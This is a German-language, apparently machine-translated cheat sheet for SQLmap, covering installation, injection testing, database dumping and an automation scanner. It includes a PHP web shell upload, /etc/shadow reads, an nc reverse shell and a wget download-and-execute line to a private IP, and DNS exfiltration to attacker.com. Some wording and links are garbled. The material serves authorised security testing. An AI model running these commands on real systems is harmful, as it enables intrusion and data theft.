SQLmap Cheat Sheet
Überblick
SQLmap ist ein Open-Source-Pensionstest-Tool, das den Prozess der Erkennung und Ausnutzung von SQL-Injektionsfehlern und der Übernahme von Datenbankservern automatisiert. SQLmap wurde von Bernardo Damele und Miroslav Stampar entwickelt und hat sich zum de facto Standard für SQL-Injektionstests entwickelt und bietet umfassende Möglichkeiten zur Identifizierung, Ausbeutung und Nachbenutzung von SQL-Injektionslücken in einer Vielzahl von Datenbankverwaltungssystemen. Die hochentwickelten Erkennungsalgorithmen und umfangreiche Datenbank-Unterstützung machen es zu einem wesentlichen Bestandteil der Web Application Security Testing und Datenbank Security Assessment Workflows.
Die Kernkraft von SQLmap liegt in der fortschrittlichen SQL-Injektionserkennungs- und -ausbeutungsmaschine, die zahlreiche Injektionstechniken unterstützt, darunter booleanbasierte Blind-, zeitbasierte Blind-, fehlerbasierte, UNION-Abfrage-basierte, gestapelte Abfragen und Out-of-Band-Injektionsmethoden. SQLmap kann automatisch SQL-Injektionslücken in GET, POST, HTTP-Header und Cookie-Parametern erkennen und ausnutzen, während verschiedene Datenbankverwaltungssysteme wie MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB und Informix unterstützt werden. Die intelligenten Fingerabdruckfunktionen des Tools können Datenbankversionen, zugrunde liegende Betriebssysteme und Anwendungstechnologien identifizieren, um die Verwertungsstrategien zu optimieren.
SQLmap's umfassendes Feature-Set beinhaltet Datenbank-Enumerationsfunktionen für die Extraktion von Datenbankschemas, Tabellen, Spalten und Daten sowie erweiterte Funktionen für die Nachbenutzung von Dateisystemen, die Ausführung von Betriebssystemen und die Exfiltration von Daten aus dem Netzwerk. Das Tool unterstützt verschiedene Authentifizierungsmechanismen, Proxykonfigurationen und Evasionstechniken, um Web Application Firewalls und Intrusionserkennungssysteme zu umgehen. Mit seinen umfangreichen Anpassungsoptionen, detaillierten Logging-Funktionen und Integrationsunterstützung für automatisierte Sicherheitstest-Pipelines bietet SQLmap sowohl manuelle Testflexibilität als auch automatisierte Bewertungsmöglichkeiten für eine umfassende Datenbanksicherheitsvalidierung.
Installation
Ubuntu/Debian Installation
Installation von SQLmap auf Ubuntu/Debian-Systemen:
```bash
Update system packages
sudo apt update && sudo apt upgrade -y
Install SQLmap from repositories
sudo apt install -y sqlmap
Install dependencies
sudo apt install -y python3 python3-pip
Verify installation
sqlmap --version
Install latest version from source
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev cd sqlmap-dev
Run from source
python3 sqlmap.py --version
Install additional dependencies
pip3 install -r requirements.txt
Create symbolic link
sudo ln -sf $(pwd)/sqlmap.py /usr/local/bin/sqlmap
Verify installation
sqlmap --version ```_
CentOS/RHEL Installation
```bash
Install EPEL repository
sudo yum install -y epel-release
Install Python and Git
sudo yum install -y python3 python3-pip git
Clone SQLmap repository
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git cd sqlmap
Install dependencies
pip3 install -r requirements.txt
Create executable script
cat > /usr/local/bin/sqlmap ``<< 'EOF'
!/bin/bash
python3 /opt/sqlmap/sqlmap.py "$@" EOF
Move SQLmap to /opt
sudo mv sqlmap /opt/ sudo chmod +x /usr/local/bin/sqlmap
Verify installation
sqlmap --version ```_
macOS Installation
```bash
Install using Homebrew
brew install sqlmap
Install using MacPorts
sudo port install sqlmap
Install from source
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git cd sqlmap python3 sqlmap.py --version
Install Python dependencies
pip3 install -r requirements.txt
Verify installation
sqlmap --version ```_
Windows Installation
```bash
Download from GitHub
https://github.com/sqlmapproject/sqlmap/archive/master.zip
Extract to desired location
Example: C:\sqlmap
Install Python 3.x from python.org
Install dependencies
pip install -r requirements.txt
Run SQLmap
python sqlmap.py --version
Alternative: Install with Chocolatey
choco install sqlmap
Verify installation
sqlmap --version ```_
Docker Installation
SQLmap in Docker ausführen:
```bash
Pull official SQLmap image
docker pull paoloo/sqlmap
Run basic scan
docker run --rm paoloo/sqlmap -u "http://example.com/page.php?id=1"
Run with custom options
docker run --rm -v $(pwd):/data paoloo/sqlmap \ -u "http://example.com/page.php?id=1" \ --batch --output-dir=/data
Create custom Dockerfile
cat >`` Dockerfile.sqlmap << 'EOF' FROM python:3.9-alpine
Install dependencies
RUN apk add --no-cache git
Clone SQLmap
RUN git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git /opt/sqlmap
Set working directory
WORKDIR /opt/sqlmap
Install Python dependencies
RUN pip install -r requirements.txt
Create entrypoint
ENTRYPOINT ["python3", "sqlmap.py"] EOF
Build custom image
docker build -f Dockerfile.sqlmap -t sqlmap-custom .
Run custom image
docker run --rm sqlmap-custom --version ```_
Basisnutzung
Zielvorgabe
Zielvorgaben für SQL-Injektionstests:
```bash
Test single URL with parameter
sqlmap -u "http://example.com/page.php?id=1"
Test URL with multiple parameters
sqlmap -u "http://example.com/page.php?id=1&name;=test"
Test specific parameter
sqlmap -u "http://example.com/page.php?id=1&name;=test" -p id
Test POST data
sqlmap -u "http://example.com/login.php" --data="username=admin&password;=test"
Test from request file
sqlmap -r request.txt
Test from Burp Suite log
sqlmap -l burp.log
Test with custom headers
sqlmap -u "http://example.com/page.php?id=1" \ --headers="X-Forwarded-For: 127.0.0.1\nUser-Agent: Custom Agent"
Test with cookies
sqlmap -u "http://example.com/page.php?id=1" \ --cookie="PHPSESSID=abc123; user=admin"
Test HTTP methods
sqlmap -u "http://example.com/api/user/1" --method=PUT
Test with authentication
sqlmap -u "http://example.com/page.php?id=1" \ --auth-type=basic --auth-cred="admin:password"
Test HTTPS with custom certificate
sqlmap -u "https://example.com/page.php?id=1" \ --ignore-ssl-errors ```_
Erkennungsoptionen
Konfiguration der SQL-Injektionserkennung:
```bash
Basic detection
sqlmap -u "http://example.com/page.php?id=1"
Specify injection techniques
sqlmap -u "http://example.com/page.php?id=1" --technique=BEUST
B: Boolean-based blind
E: Error-based
U: Union query-based
S: Stacked queries
T: Time-based blind
Test specific DBMS
sqlmap -u "http://example.com/page.php?id=1" --dbms=mysql
Increase detection level
sqlmap -u "http://example.com/page.php?id=1" --level=5
Increase risk level
sqlmap -u "http://example.com/page.php?id=1" --risk=3
Test all parameters
sqlmap -u "http://example.com/page.php?id=1&name;=test" --all
Skip URL encoding
sqlmap -u "http://example.com/page.php?id=1" --skip-urlencode
Custom injection payloads
sqlmap -u "http://example.com/page.php?id=1" --tamper=space2comment
Test with time delay
sqlmap -u "http://example.com/page.php?id=1" --time-sec=10
Test with custom boundaries
sqlmap -u "http://example.com/page.php?id=1" --boundaries="*" ```_
Datenbankaufzählung
Aufzählung von Datenbankinformationen:
```bash
Get current user
sqlmap -u "http://example.com/page.php?id=1" --current-user
Get current database
sqlmap -u "http://example.com/page.php?id=1" --current-db
Check if user is DBA
sqlmap -u "http://example.com/page.php?id=1" --is-dba
List databases
sqlmap -u "http://example.com/page.php?id=1" --dbs
List tables in database
sqlmap -u "http://example.com/page.php?id=1" -D database_name --tables
List columns in table
sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name --columns
Dump table data
sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name --dump
Dump specific columns
sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name -C "username,password" --dump
Dump all databases
sqlmap -u "http://example.com/page.php?id=1" --dump-all
Get database users
sqlmap -u "http://example.com/page.php?id=1" --users
Get user passwords
sqlmap -u "http://example.com/page.php?id=1" --passwords
Get user privileges
sqlmap -u "http://example.com/page.php?id=1" --privileges
Get database schema
sqlmap -u "http://example.com/page.php?id=1" --schema
Search for specific data
sqlmap -u "http://example.com/page.php?id=1" --search -C password ```_
Erweiterte Funktionen
Zugriff auf das System
Zugriff auf das Dateisystem durch SQL-Injektion:
```bash
Read file from file system
sqlmap -u "http://example.com/page.php?id=1" --file-read="/etc/passwd"
Write file to file system
sqlmap -u "http://example.com/page.php?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"
Upload file via SQL injection
echo "<?php system(\$_GET['cmd']); ?>" > webshell.php sqlmap -u "http://example.com/page.php?id=1" --file-write="webshell.php" --file-dest="/var/www/html/cmd.php"
Read common configuration files
sqlmap -u "http://example.com/page.php?id=1" --file-read="/etc/mysql/my.cnf" sqlmap -u "http://example.com/page.php?id=1" --file-read="/var/www/html/config.php" sqlmap -u "http://example.com/page.php?id=1" --file-read="/etc/apache2/apache2.conf"
Read application files
sqlmap -u "http://example.com/page.php?id=1" --file-read="/var/log/apache2/access.log" sqlmap -u "http://example.com/page.php?id=1" --file-read="/var/log/mysql/error.log"
Download multiple files
for file in /etc/passwd /etc/shadow /etc/hosts; do sqlmap -u "http://example.com/page.php?id=1" --file-read="$file" --batch done ```_
Zugriff auf das Betriebssystem
Befehle des Betriebssystems ausführen:
```bash
Execute OS commands
sqlmap -u "http://example.com/page.php?id=1" --os-cmd="whoami"
Interactive OS shell
sqlmap -u "http://example.com/page.php?id=1" --os-shell
Execute PowerShell commands (Windows)
sqlmap -u "http://example.com/page.php?id=1" --os-pwn
Upload and execute Meterpreter payload
sqlmap -u "http://example.com/page.php?id=1" --os-pwn --msf-path="/opt/metasploit-framework"
Execute commands with specific user
sqlmap -u "http://example.com/page.php?id=1" --os-cmd="id" --priv-esc
Execute batch commands
sqlmap -u "http://example.com/page.php?id=1" --os-cmd="uname -a; ps aux; netstat -tulpn"
Create reverse shell
sqlmap -u "http://example.com/page.php?id=1" --os-cmd="nc -e /bin/bash 192.168.1.100 4444"
Download and execute script
sqlmap -u "http://example.com/page.php?id=1" --os-cmd="wget http://192.168.1.100/script.sh -O /tmp/script.sh && chmod +x /tmp/script.sh && /tmp/script.sh" ```_
WAF Bypass Techniken
Umgehung der Web-Anwendung Firewalls:
```bash
Use tamper scripts
sqlmap -u "http://example.com/page.php?id=1" --tamper=space2comment sqlmap -u "http://example.com/page.php?id=1" --tamper=charencode sqlmap -u "http://example.com/page.php?id=1" --tamper=randomcase
Multiple tamper scripts
sqlmap -u "http://example.com/page.php?id=1" --tamper=space2comment,charencode,randomcase
Common WAF bypass tampers
sqlmap -u "http://example.com/page.php?id=1" --tamper=apostrophemask sqlmap -u "http://example.com/page.php?id=1" --tamper=equaltolike sqlmap -u "http://example.com/page.php?id=1" --tamper=greatest sqlmap -u "http://example.com/page.php?id=1" --tamper=halfversionedmorekeywords sqlmap -u "http://example.com/page.php?id=1" --tamper=modsecurityversioned sqlmap -u "http://example.com/page.php?id=1" --tamper=space2mysqldash sqlmap -u "http://example.com/page.php?id=1" --tamper=versionedkeywords sqlmap -u "http://example.com/page.php?id=1" --tamper=versionedmorekeywords
Custom User-Agent
sqlmap -u "http://example.com/page.php?id=1" --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1)"
Random User-Agent
sqlmap -u "http://example.com/page.php?id=1" --random-agent
Custom delay between requests
sqlmap -u "http://example.com/page.php?id=1" --delay=2
Use proxy for requests
sqlmap -u "http://example.com/page.php?id=1" --proxy="http://127.0.0.1:8080"
Use Tor network
sqlmap -u "http://example.com/page.php?id=1" --tor --tor-type=SOCKS5
Chunked transfer encoding
sqlmap -u "http://example.com/page.php?id=1" --chunked ```_
Advanced Injection Techniques
Spezialisierte Injektionstechniken:
```bash
Second-order SQL injection
sqlmap -u "http://example.com/register.php" --data="username=admin&email;=test@test.com" --second-order="http://example.com/profile.php"
DNS exfiltration
sqlmap -u "http://example.com/page.php?id=1" --dns-domain="attacker.com"
Time-based blind injection with custom time
sqlmap -u "http://example.com/page.php?id=1" --technique=T --time-sec=5
Union-based injection with custom columns
sqlmap -u "http://example.com/page.php?id=1" --technique=U --union-cols=1-20
Error-based injection
sqlmap -u "http://example.com/page.php?id=1" --technique=E
Boolean-based blind injection
sqlmap -u "http://example.com/page.php?id=1" --technique=B
Stacked queries
sqlmap -u "http://example.com/page.php?id=1" --technique=S
Custom injection point
sqlmap -u "http://example.com/page.php" --data="id=1*&name;=test" --method=POST
JSON injection
sqlmap -u "http://example.com/api/user" --data='\\{"id": 1*, "name": "test"\\}' --headers="Content-Type: application/json"
XML injection
sqlmap -u "http://example.com/soap" --data='<?xml version="1.0"?>
Automatisierungsskripte
Umfassender SQL Injection Scanner
```python
!/usr/bin/env python3
Comprehensive SQL injection testing with SQLmap
import subprocess import json import os import sys import time import argparse from datetime import datetime import xml.etree.ElementTree as ET import requests from urllib.parse import urlparse, parse_qs
class SQLmapScanner: def init(self, sqlmap_path="sqlmap"): self.sqlmap_path = sqlmap_path self.results = \\{\\} self.session_dir = f"/tmp/sqlmap_session_\\{int(time.time())\\}"
def verify_sqlmap_installation(self):
"""Verify SQLmap installation"""
try:
result = subprocess.run([self.sqlmap_path, "--version"],
capture_output=True, text=True)
if result.returncode == 0:
version_line = result.stdout.strip()
print(f"SQLmap version: \\\\{version_line\\\\}")
return True
else:
print("SQLmap not found or not working")
return False
except Exception as e:
print(f"Error checking SQLmap installation: \\\\{e\\\\}")
return False
def create_session_directory(self):
"""Create session directory for SQLmap output"""
try:
os.makedirs(self.session_dir, exist_ok=True)
print(f"Session directory created: \\\\{self.session_dir\\\\}")
return True
except Exception as e:
print(f"Error creating session directory: \\\\{e\\\\}")
return False
def test_url_for_sqli(self, url, method="GET", data=None, headers=None, cookies=None):
"""Test URL for SQL injection vulnerabilities"""
print(f"Testing URL for SQL injection: \\\\{url\\\\}")
cmd = [
self.sqlmap_path,
"-u", url,
"--batch",
"--output-dir", self.session_dir,
"--level", "3",
"--risk", "2",
"--technique", "BEUST",
"--threads", "5"
]
if method.upper() == "POST" and data:
cmd.extend(["--data", data])
if headers:
header_string = "\n".join([f"\\\\{k\\\\}: \\\\{v\\\\}" for k, v in headers.items()])
cmd.extend(["--headers", header_string])
if cookies:
cookie_string = "; ".join([f"\\\\{k\\\\}=\\\\{v\\\\}" for k, v in cookies.items()])
cmd.extend(["--cookie", cookie_string])
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=1800)
if result.returncode == 0:
vulnerable = self.parse_sqlmap_output(result.stdout)
return \\\\{
'vulnerable': vulnerable,
'output': result.stdout,
'error': result.stderr
\\\\}
else:
print(f"SQLmap test failed: \\\\{result.stderr\\\\}")
return \\\\{
'vulnerable': False,
'output': result.stdout,
'error': result.stderr
\\\\}
except subprocess.TimeoutExpired:
print("SQLmap test timed out")
return \\\\{
'vulnerable': False,
'output': "",
'error': "Timeout"
\\\\}
except Exception as e:
print(f"Error during SQLmap test: \\\\{e\\\\}")
return \\\\{
'vulnerable': False,
'output': "",
'error': str(e)
\\\\}
def parse_sqlmap_output(self, output):
"""Parse SQLmap output to determine if vulnerable"""
vulnerable_indicators = [
"is vulnerable",
"injectable",
"Parameter:",
"Type:",
"Title:",
"Payload:"
]
for indicator in vulnerable_indicators:
if indicator in output:
return True
return False
def enumerate_database(self, url, method="GET", data=None):
"""Enumerate database information"""
print(f"Enumerating database for: \\\\{url\\\\}")
enumeration_commands = [
["--current-user"],
["--current-db"],
["--is-dba"],
["--dbs"],
["--users"],
["--passwords"]
]
enumeration_results = \\\\{\\\\}
for enum_cmd in enumeration_commands:
cmd = [
self.sqlmap_path,
"-u", url,
"--batch",
"--output-dir", self.session_dir
]
if method.upper() == "POST" and data:
cmd.extend(["--data", data])
cmd.extend(enum_cmd)
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=600)
if result.returncode == 0:
enum_type = enum_cmd[0].replace("--", "")
enumeration_results[enum_type] = \\\\{
'output': result.stdout,
'success': True
\\\\}
else:
enum_type = enum_cmd[0].replace("--", "")
enumeration_results[enum_type] = \\\\{
'output': result.stderr,
'success': False
\\\\}
except subprocess.TimeoutExpired:
enum_type = enum_cmd[0].replace("--", "")
enumeration_results[enum_type] = \\\\{
'output': "Timeout",
'success': False
\\\\}
except Exception as e:
enum_type = enum_cmd[0].replace("--", "")
enumeration_results[enum_type] = \\\\{
'output': str(e),
'success': False
\\\\}
return enumeration_results
def dump_database_data(self, url, database=None, table=None, columns=None):
"""Dump database data"""
print(f"Dumping database data for: \\\\{url\\\\}")
cmd = [
self.sqlmap_path,
"-u", url,
"--batch",
"--output-dir", self.session_dir
]
if database and table and columns:
cmd.extend(["-D", database, "-T", table, "-C", columns, "--dump"])
elif database and table:
cmd.extend(["-D", database, "-T", table, "--dump"])
elif database:
cmd.extend(["-D", database, "--tables"])
else:
cmd.extend(["--dbs"])
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=1800)
if result.returncode == 0:
return \\\\{
'success': True,
'output': result.stdout,
'error': result.stderr
\\\\}
else:
return \\\\{
'success': False,
'output': result.stdout,
'error': result.stderr
\\\\}
except subprocess.TimeoutExpired:
return \\\\{
'success': False,
'output': "",
'error': "Timeout"
\\\\}
except Exception as e:
return \\\\{
'success': False,
'output': "",
'error': str(e)
\\\\}
def test_file_access(self, url):
"""Test file system access capabilities"""
print(f"Testing file access for: \\\\{url\\\\}")
test_files = [
"/etc/passwd",
"/etc/hosts",
"/var/www/html/index.php",
"C:\\Windows\\System32\\drivers\\etc\\hosts",
"C:\\inetpub\\wwwroot\\web.config"
]
file_access_results = \\\\{\\\\}
for test_file in test_files:
cmd = [
self.sqlmap_path,
"-u", url,
"--batch",
"--output-dir", self.session_dir,
"--file-read", test_file
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
file_access_results[test_file] = \\\\{
'accessible': result.returncode == 0 and "do you want to retrieve" not in result.stdout,
'output': result.stdout,
'error': result.stderr
\\\\}
except subprocess.TimeoutExpired:
file_access_results[test_file] = \\\\{
'accessible': False,
'output': "",
'error': "Timeout"
\\\\}
except Exception as e:
file_access_results[test_file] = \\\\{
'accessible': False,
'output': "",
'error': str(e)
\\\\}
return file_access_results
def test_os_access(self, url):
"""Test operating system command execution"""
print(f"Testing OS access for: \\\\{url\\\\}")
test_commands = [
"whoami",
"id",
"uname -a",
"systeminfo"
]
os_access_results = \\\\{\\\\}
for test_cmd in test_commands:
cmd = [
self.sqlmap_path,
"-u", url,
"--batch",
"--output-dir", self.session_dir,
"--os-cmd", test_cmd
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
os_access_results[test_cmd] = \\\\{
'executed': result.returncode == 0 and "command standard output" in result.stdout,
'output': result.stdout,
'error': result.stderr
\\\\}
except subprocess.TimeoutExpired:
os_access_results[test_cmd] = \\\\{
'executed': False,
'output': "",
'error': "Timeout"
\\\\}
except Exception as e:
os_access_results[test_cmd] = \\\\{
'executed': False,
'output': "",
'error': str(e)
\\\\}
return os_access_results
def comprehensive_scan(self, target_urls, output_dir="/tmp/sqlmap_comprehensive"):
"""Perform comprehensive SQL injection assessment"""
print("Starting comprehensive SQL injection assessment...")
# Create output directory
os.makedirs(output_dir, exist_ok=True)
assessment_results = \\\\{
'start_time': time.time(),
'target_urls': target_urls,
'vulnerable_urls': [],
'enumeration_results': \\\\{\\\\},
'file_access_results': \\\\{\\\\},
'os_access_results': \\\\{\\\\},
'dump_results': \\\\{\\\\}
\\\\}
for url in target_urls:
print(f"Testing URL: \\\\{url\\\\}")
# Test for SQL injection
sqli_result = self.test_url_for_sqli(url)
if sqli_result['vulnerable']:
print(f"SQL injection found in: \\\\{url\\\\}")
assessment_results['vulnerable_urls'].append(url)
# Enumerate database
enum_results = self.enumerate_database(url)
assessment_results['enumeration_results'][url] = enum_results
# Test file access
file_results = self.test_file_access(url)
assessment_results['file_access_results'][url] = file_results
# Test OS access
os_results = self.test_os_access(url)
assessment_results['os_access_results'][url] = os_results
# Dump sample data
dump_results = self.dump_database_data(url)
assessment_results['dump_results'][url] = dump_results
else:
print(f"No SQL injection found in: \\\\{url\\\\}")
assessment_results['end_time'] = time.time()
assessment_results['duration'] = assessment_results['end_time'] - assessment_results['start_time']
# Generate reports
self.generate_json_report(assessment_results, os.path.join(output_dir, "sqlmap_results.json"))
self.generate_html_report(assessment_results, os.path.join(output_dir, "sqlmap_report.html"))
print(f"Comprehensive assessment completed in \\\\{assessment_results['duration']:.2f\\\\} seconds")
print(f"Found SQL injection in \\\\{len(assessment_results['vulnerable_urls'])\\\\} URLs")
return assessment_results
def generate_json_report(self, results, output_file):
"""Generate JSON report"""
with open(output_file, 'w') as f:
json.dump(results, f, indent=2, default=str)
print(f"JSON report generated: \\\\{output_file\\\\}")
def generate_html_report(self, results, output_file):
"""Generate HTML report"""
html_content = f"""
SQLmap Comprehensive Assessment Report
Generated: \\\\{datetime.now().isoformat()\\\\}
Assessment Duration: \\\\{results['duration']:.2f\\\\} seconds
Executive Summary
- Total URLs Tested: \\\\{len(results['target_urls'])\\\\}
- Vulnerable URLs: \\\\{len(results['vulnerable_urls'])\\\\}
- File Access Possible: \\\\{sum(1 for url_results in results['file_access_results'].values() for file_result in url_results.values() if file_result['accessible'])\\\\}
- OS Command Execution: \\\\{sum(1 for url_results in results['os_access_results'].values() for cmd_result in url_results.values() if cmd_result['executed'])\\\\}
Vulnerable URLs
| URL | Database Access | File Access | OS Access |
|---|---|---|---|
| \\\\{url\\\\} | \\\\{db_access\\\\} | \\\\{file_access\\\\} | \\\\{os_access\\\\} |
Detailed Findings
""" for url in results['vulnerable_urls']: html_content += f"""\\\\{url\\\\}
Database Enumeration
\\\\{json.dumps(results['enumeration_results'].get(url, \\\\{\\\\}), indent=2)\\\\}
File Access Results
\\\\{json.dumps(results['file_access_results'].get(url, \\\\{\\\\}), indent=2)\\\\}
OS Access Results
\\\\{json.dumps(results['os_access_results'].get(url, \\\\{\\\\}), indent=2)\\\\}
"""
html_content += """
Recommendations
- Implement parameterized queries/prepared statements
- Use input validation and sanitization
- Apply principle of least privilege for database accounts
- Implement Web Application Firewall (WAF)
- Regular security code reviews and testing
- Keep database software updated
- Monitor database access and queries
"""
with open(output_file, 'w') as f:
f.write(html_content)
print(f"HTML report generated: \\\\{output_file\\\\}")
def main(): parser = argparse.ArgumentParser(description='SQLmap Comprehensive Scanner') parser.add_argument('--urls', nargs='+', required=True, help='URLs to test') parser.add_argument('--output', default='/tmp/sqlmap_assessment', help='Output directory') parser.add_argument('--sqlmap-path', default='sqlmap', help='Path to SQLmap executable')
args = parser.parse_args()
# Initialize scanner
scanner = SQLmapScanner(args.sqlmap_path)
# Verify installation
if not scanner.verify_sqlmap_installation():
print("SQLmap not properly installed or configured")
sys.exit(1)
# Create session directory
if not scanner.create_session_directory():
print("Failed to create session directory")
sys.exit(1)
# Run comprehensive scan
results = scanner.comprehensive_scan(args.urls, args.output)
if results:
print("Comprehensive assessment completed successfully")
else:
print("Comprehensive assessment failed")
sys.exit(1)
if name == "main": main() ```_
Integrationsbeispiele
CI/CD Integration
```yaml
Jenkins Pipeline for SQLmap Integration
pipeline \\{ agent \\{ label 'security-testing' \\}
environment \\\\{
TARGET_URL = 'http: //test-app.company.com'
SQLMAP_OUTPUT = './sqlmap-results'
\\\\}
stages \\\\{
stage('Setup Environment') \\\\{
steps \\\\{
script \\\\{
// Install SQLmap if not present
sh '''
if ! command -v sqlmap &> /dev/null; then
git clone https: //github.com/sqlmapproject/sqlmap.git
export PATH=$PATH: $(pwd)/sqlmap
fi
sqlmap --version
'''
\\\\}
\\\\}
\\\\}
stage('SQL Injection Testing') \\\\{
steps \\\\{
script \\\\{
// Run SQLmap tests
sh '''
mkdir -p $\\\\{SQLMAP_OUTPUT\\\\}
# Test main application endpoints
python3 sqlmap_scanner.py \
--urls "$\\\\{TARGET_URL\\\\}/login.php?id=1" \
"$\\\\{TARGET_URL\\\\}/search.php?q=test" \
"$\\\\{TARGET_URL\\\\}/product.php?id=1" \
--output $\\\\{SQLMAP_OUTPUT\\\\}
'''
\\\\}
\\\\}
\\\\}
stage('Process Results') \\\\{
steps \\\\{
// Archive results
archiveArtifacts artifacts: 'sqlmap-results/**/*', fingerprint: true
// Publish report
publishHTML([
allowMissing: false,
alwaysLinkToLastBuild: true,
keepAll: true,
reportDir: 'sqlmap-results',
reportFiles: '*.html',
reportName: 'SQLmap Assessment Report'
])
// Check for vulnerabilities
script \\\\{
def vulnerabilities = sh(
| script: "grep -c 'vulnerable' sqlmap-results/*.json | | true", | returnStdout: true ).trim()
if (vulnerabilities.toInteger() > 0) \\\\{
currentBuild.result = 'UNSTABLE'
echo "Found $\\\\{vulnerabilities\\\\} SQL injection vulnerabilities"
\\\\}
\\\\}
\\\\}
\\\\}
\\\\}
post \\\\{
always \\\\{
// Clean up sensitive data
sh 'rm -rf sqlmap-results/*.log'
\\\\}
failure \\\\{
// Send notification
emailext (
subject: "SQL Injection Testing Failed: $\\\\{env.JOB_NAME\\\\} - $\\\\{env.BUILD_NUMBER\\\\}",
body: "SQL injection testing failed. Check console output for details.",
to: "$\\\\{env.SECURITY_TEAM_EMAIL\\\\}"
)
\\\\}
\\\\}
\\} ```_
Fehlerbehebung
Gemeinsame Themen
Anmeldefragen: ```bash
Test basic connectivity
curl -I "http://example.com/page.php?id=1"
Use proxy for debugging
sqlmap -u "http://example.com/page.php?id=1" --proxy="http://127.0.0.1:8080"
Ignore SSL errors
sqlmap -u "https://example.com/page.php?id=1" --ignore-ssl-errors
Custom timeout
sqlmap -u "http://example.com/page.php?id=1" --timeout=30
Retry failed requests
sqlmap -u "http://example.com/page.php?id=1" --retries=3 ```_
Detection Issues: ```bash
Increase detection level and risk
sqlmap -u "http://example.com/page.php?id=1" --level=5 --risk=3
Test all parameters
sqlmap -u "http://example.com/page.php?id=1&name;=test" --all
Force specific DBMS
sqlmap -u "http://example.com/page.php?id=1" --dbms=mysql --force-ssl
Use different techniques
sqlmap -u "http://example.com/page.php?id=1" --technique=T --time-sec=10
Skip URL encoding
sqlmap -u "http://example.com/page.php?id=1" --skip-urlencode ```_
** WAF Bypass Issues:** ```bash
Use multiple tamper scripts
sqlmap -u "http://example.com/page.php?id=1" --tamper=space2comment,charencode,randomcase
Random User-Agent
sqlmap -u "http://example.com/page.php?id=1" --random-agent
Add delays
sqlmap -u "http://example.com/page.php?id=1" --delay=3
Use Tor
sqlmap -u "http://example.com/page.php?id=1" --tor --tor-type=SOCKS5
Custom headers
sqlmap -u "http://example.com/page.php?id=1" --headers="X-Originating-IP: 127.0.0.1" ```_
Leistungsoptimierung
Optimierung der SQLmap-Leistung:
```bash
Increase threads
sqlmap -u "http://example.com/page.php?id=1" --threads=10
Optimize for speed
sqlmap -u "http://example.com/page.php?id=1" --level=1 --risk=1
Skip unnecessary tests
sqlmap -u "http://example.com/page.php?id=1" --skip-waf
Use specific technique
sqlmap -u "http://example.com/page.php?id=1" --technique=U
Limit data retrieval
sqlmap -u "http://example.com/page.php?id=1" -D database -T table --start=1 --stop=100 ```_
Sicherheitsüberlegungen
Operationelle Sicherheit
Legal und Ethische Nutzung: - Nur Testanwendungen, die Sie besitzen oder eine ausdrückliche Erlaubnis zum Testen haben - Rechtsanforderungen für Web-Anwendungstests in Ihrer Gerichtsbarkeit verstehen - Durchführung ordnungsgemäßer Berechtigungs- und Dokumentationsverfahren - Einschränkungen des Umfangs und Regeln des Engagements - Bewusstsein für mögliche Datenexposition und Servicestörungen
Datenschutz: - Verschlüsseln von SQLmap-Sitzungsdateien und Ausgabedaten - Umsetzung sicherer Datenschutzbestimmungen für Bewertungsergebnisse - Zugriff auf SQL-Injektionstests und -Ergebnisse steuern - Sichere Übermittlung von Bewertungsberichten und Erkenntnissen - Regelmäßige Reinigung von temporären Dateien und Sitzungsdaten
Defensive Überlegungen
** Erkennung und Prävention:** - Monitor für SQLmap Signaturen und SQL-Injektionsmuster - Web Application Firewalls (WAF) mit SQL Injektionsschutz implementieren - Bereitstellung von Datenbankaktivitätsüberwachung und Anomalieerkennung - Regelmäßige Sicherheitscodebewertungen und statische Analyse - Eingangsvalidierung und parametrisierte Abfrage-Implementierung
Referenzen
- SQLmap Offizielle Dokumentation
- SQLmap GitHub Repository
- [OWASP SQL Injection Prevention](https://_LINK_5__
- [SQL Injection Testing Guide](__LINK_5___
- (__LINK_5___)